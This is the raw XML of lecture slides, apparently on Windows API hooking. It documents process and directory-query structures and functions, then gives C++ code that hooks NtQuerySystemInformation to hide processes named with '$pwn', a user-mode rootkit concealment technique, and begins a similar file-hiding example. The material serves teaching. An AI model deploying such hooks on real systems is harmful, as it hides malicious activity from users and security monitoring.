              <a:ea typeface="+mn-ea"/>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0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SYSTEM_PROCESS_INFORMATION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222250" y="1083945"/>
            <a:ext cx="4687570" cy="5285105"/>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sz="1500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>typedef struct _SYSTEM_PROCESS_INFORMATION {</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NextEntryOffset;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NumberOfThreads;</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BYTE Reserved1[48];</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UNICODE_STRING ImageName;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KPRIORITY BasePriority;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HANDLE UniqueProcessId;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Reserved2;</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HandleCount;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SessionId;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Reserved3;</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PeakVirtualSize;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VirtualSize;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ULONG Reserved4;</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PeakWorkingSetSize;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WorkingSetSize;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Reserved5;</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QuotaPagedPoolUsage;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PVOID Reserved6;</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QuotaNonPagedPoolUsage;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PagefileUsage;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PeakPagefileUsage;</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SIZE_T PrivatePageCount;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LARGE_INTEGER Reserved7[6];</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SYSTEM_PROCESS_INFORMATION;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Box 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4907280" y="3140075"/>
            <a:ext cx="7096760" cy="324612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NextEntryOffset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start of the next item in the array is the address of the previous item plus  the value in the NextEntryOffset member. For the last item in the array, NextEntryOffset is 0.</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ImageName</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member contains the process's image name.</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BasePriority</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BasePriority member contains the base priority of the process, which is the starting priority for threads created within the associated process.</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PeakVirtualSize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member contains the peak size, in bytes, of the virtual memory used by the process.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="组合 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5150485" y="1083945"/>
            <a:ext cx="6891020" cy="2001520"/>
            <a:chOff x="8111" y="1707"/>
            <a:chExt cx="10852" cy="3152"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="圆角矩形 2"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8171" y="1707"/>
              <a:ext cx="10733" cy="3153"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 8909"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="CA3E9D">
                <a:alpha val="5000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="CA3E9D"/>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8111" y="1879"/>
              <a:ext cx="10852" cy="2809"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr marL="360045" indent="-179705" algn="l" fontAlgn="auto">
                <a:buSzPct val="150000"/>
                <a:buBlip>
                  <a:blip r:embed="rId6"/>
                </a:buBlip>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2200">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>These structures contain information about the resource usage of each process, including the number of threads and handles used by the process, the peak page-file usage, and the number of memory pages that the process has allocated.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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wcstombs_s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0225" y="4122420"/>
            <a:ext cx="9890125" cy="2266315"/>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pReturnValue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size in bytes of the converted string, including the null terminator.</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mbstr</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address of a buffer for the resulting converted multibyte character string.</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sizeInBytes</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The size in bytes of the mbstr buffer.</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wcstr</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Points to the wide character string to be converted.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>The maximum number of bytes to store in the mbstr buffer, not including the terminating null character, or _TRUNCATE.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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589915" y="1158875"/>
            <a:ext cx="3429000" cy="2784475"/>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sz="2500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>errno_t wcstombs_s(</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*pReturnValue,</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char *mbstr,</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sizeInBytes,</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const wchar_t *wcstr,</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   size_t count</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="10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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="组合 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="5083175" y="1608455"/>
            <a:ext cx="6518910" cy="1734820"/>
            <a:chOff x="8286" y="2697"/>
            <a:chExt cx="10266" cy="2732"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="圆角矩形标注 2"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8286" y="2697"/>
              <a:ext cx="10267" cy="2733"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -65749"/>
                <a:gd name="adj2" fmla="val -933"/>
                <a:gd name="adj3" fmla="val 16667"/>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8287" y="2901"/>
              <a:ext cx="10265" cy="2325"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr marL="720090" indent="-539750" algn="l" fontAlgn="auto">
                <a:buSzPct val="150000"/>
                <a:buBlip>
                  <a:blip r:embed="rId6"/>
                </a:buBlip>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="3000">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Converts a sequence of wide characters to a corresponding sequence of multibyte characters. </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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StrStrIA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0225" y="4732655"/>
            <a:ext cx="9890125" cy="88392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pszFirst</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null-terminated string being searched.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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pszSrch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>:</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substring to search for.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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905510" y="1673225"/>
            <a:ext cx="3429000" cy="2245360"/>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500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>PCSTR StrStrIA(</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  [in] PCSTR pszFirst,</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  [in] PCSTR pszSrch</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="14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sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="圆角矩形标注 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5083175" y="1928495"/>
            <a:ext cx="6519545" cy="1735455"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -61415"/>
              <a:gd name="adj2" fmla="val 384"/>
              <a:gd name="adj3" fmla="val 16667"/>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5083810" y="2058035"/>
            <a:ext cx="6518275" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="720090" indent="-539750" algn="l" fontAlgn="auto">
              <a:buSzPct val="150000"/>
              <a:buBlip>
                <a:blip r:embed="rId6"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Finds the first occurrence of a substring within a string. The comparison is not case-sensitive.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34"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NtQueryDirectoryFile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199390" y="4458970"/>
            <a:ext cx="9890125" cy="1943100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>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[in] FileHandle</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handle to the directory or file for which you want to retrieve directory information.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>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[out] IoStatusBlock</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pointer to an IO_STATUS_BLOCK structure that receives the final completion status and information about the operation.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="5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[out] FileInformation</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A pointer to a buffer that receives the desired information about the file. The structure of the information returned in the buffer is defined by the FileInformationClass parameter.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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348615" y="1019175"/>
            <a:ext cx="6770370" cy="3325495"/>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a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>__kernel_entry NTSYSCALLAPI NTSTATUS NtQueryDirectoryFile(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HANDLE                 FileHandle,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HANDLE                 Event,</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PIO_APC_ROUTINE        ApcRoutine,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PVOID                  ApcContext,</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[out]          PIO_STATUS_BLOCK       IoStatusBlock,</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[out]          PVOID                  FileInformation,</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ULONG                  Length,</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FILE_INFORMATION_CLASS FileInformationClass,</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BOOLEAN                ReturnSingleEntry,</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optional] PUNICODE_STRING        FileName,</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  [in]           BOOLEAN                RestartScan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="组合 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7280275" y="1387475"/>
            <a:ext cx="4805045" cy="2576830"/>
            <a:chOff x="11465" y="1605"/>
            <a:chExt cx="7567" cy="4058"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="圆角矩形 2"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11465" y="1605"/>
              <a:ext cx="7567" cy="4058"/>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1996"/>
              <a:ext cx="7566" cy="3415"/>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The NtQueryDirectoryFile routine returns information about files and directories in a directory.</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2700">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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FILE_ID_BOTH_DIR_INFORMATION </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348615" y="1019175"/>
            <a:ext cx="4446905" cy="5354320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D1202F"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>typedef struct _FILE_ID_BOTH_DIR_INFORMATION {</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NextEntryOffset;</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FileIndex;</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CreationTime;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LastAccessTime;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LastWriteTime;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ChangeTime;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EndOfFile;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AllocationSize;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FileAttributes;</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FileNameLength;</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ULONG         EaSize;</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CCHAR         ShortNameLength;</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WCHAR         ShortName[12];</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LARGE_INTEGER FileId;</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WCHAR         FileName[1];</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>} FILE_ID_BOTH_DIR_INFORMATION, *PFILE_ID_BOTH_DIR_INFORMATION;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="圆角矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5121275" y="1019175"/>
            <a:ext cx="6709410" cy="1701165"/>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4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5121593" y="1200785"/>
            <a:ext cx="6708775" cy="1337945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="720090" indent="-539750" algn="l" fontAlgn="auto">
              <a:buSzPct val="150000"/>
              <a:buBlip>
                <a:blip r:embed="rId5"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The structure is used to query file reference number information for the files in a directory.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Box 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4911090" y="2978785"/>
            <a:ext cx="6919595" cy="2960370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:sp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NextEntryOffset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Byte offset of the next FILE_ID_BOTH_DIR_INFORMATION entry, if multiple entries are present in a buffer. This member is zero if no other entries follow this one.</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FileIndex</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Byte offset of the file within the parent directory. This member is undefined for file systems, such as NTFS, in which the position of a file within the parent directory is not fixed and can be changed at any time to maintain sort order</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304"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CreateThread</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199390" y="4458970"/>
            <a:ext cx="11655425" cy="1699260"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>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dwStackSize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initial size of the stack, in bytes. The system rounds this value to the nearest page.</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lpStartAddress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application-defined function to be executed by the thread.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="8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[out, optional] lpThreadId</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pointer to a variable that receives the thread identifier.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="5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348615" y="1019175"/>
            <a:ext cx="6770370" cy="3138170"/>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000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>HANDLE CreateThread(</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optional]  LPSECURITY_ATTRIBUTES   lpThreadAttributes,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SIZE_T                  dwStackSize,</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LPTHREAD_START_ROUTINE  lpStartAddress,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optional]  __drv_aliasesMem LPVOID lpParameter,</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[in]            DWORD                   dwCreationFlags,</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  [out, optional] LPDWORD                 lpThreadId</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="11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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="组合 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7280275" y="1387475"/>
            <a:ext cx="4805045" cy="2259965"/>
            <a:chOff x="11465" y="1605"/>
            <a:chExt cx="7567" cy="3559"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="圆角矩形 2"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11465" y="1605"/>
              <a:ext cx="7567" cy="3559"/>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2004"/>
              <a:ext cx="7566" cy="2761"/>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Creates a thread to execute within the virtual address space of the calling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Example-Hook and hide process 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2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="241300" y="1036320"/>
            <a:ext cx="11823700" cy="10686415"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E74C3C">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>#define STATUS_SUCCESS  ((NTSTATUS)0x00000000L)</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using lpNtQuerySystemInformation = NTSTATUS (WINAPI *)(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);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lpNtQuerySystemInformation lpOrgNtQuerySystemInformation;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using lpNtQueryDirectoryFile = NTSTATUS (WINAPI *)(HANDLE FileHandle, HANDLE Event, PIO_APC_ROUTINE ApcRoutine, PVOID ApcContext, PIO_STATUS_BLOCK IoStatusBlock, PVOID FileInformation, ULONG Length, FILE_INFORMATION_CLASS FileInformationClass, BOOLEAN ReturnSingleEntry, PUNICODE_STRING FileName, BOOLEAN RestartScan);</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lpNtQueryDirectoryFile lpOrgNtQueryDirectoryFile;</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char lpCurrentProcessName[MAX_PATH];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char lpCurrentDirectoryName[MAX_PATH];</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>//this function is to hide certain processes with name including "$pwn"</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NTSTATUS WINAPI hkNtQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength)</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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//returns information about </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>processes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const NTSTATUS QueryStatus = lpOrgNtQuerySystemInformation(SystemInformationClass, SystemInformation, SystemInformationLength,ReturnLength);</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(SystemInformationClass == _SYSTEM_INFORMATION_CLASS::SystemProcessInformation &amp;&amp; QueryStatus == STATUS_SUCCESS)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PSYSTEM_PROCESS_INFORMATION lpCurrentProcess; //process information</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auto lpNextProcess = (PSYSTEM_PROCESS_INFORMATION)SystemInformation;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do</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lpCurrentProcess = lpNextProcess;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lpNextProcess = (PSYSTEM_PROCESS_INFORMATION)((DWORD_PTR)lpCurrentProcess + lpCurrentProcess-&gt;NextEntryOffset); //obtain the next process information</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wcstombs_s(nullptr, lpCurrentProcessName, lpNextProcess-&gt;ImageName.Buffer, MAX_PATH); //Converts a sequence of wide characters to a corresponding sequence of multibyte characters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lpCurrentProcessName[MAX_PATH - 1] = '\0';</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(StrStrIA(lpCurrentProcessName, "$pwn"))</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(lpNextProcess-&gt;NextEntryOffset == 0)   //trying to hide the next process ("$pwn")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> //it’s the last process</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lpCurrentProcess-&gt;NextEntryOffset = 0;</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else</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lpCurrentProcess-&gt;NextEntryOffset += lpNextProcess-&gt;NextEntryOffset;</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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lpNextProcess = lpCurrentProcess;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 while (lpCurrentProcess-&gt;NextEntryOffset != 0);</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lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pP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	return QueryStatus;</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>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 -0.777222 " pathEditMode="relative" ptsTypes="">
                                      <p:cBhvr>
                                        <p:cTn id="6"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Example-Hook and hide file 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240030" y="1038860"/>
            <a:ext cx="11711940" cy="8632190"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
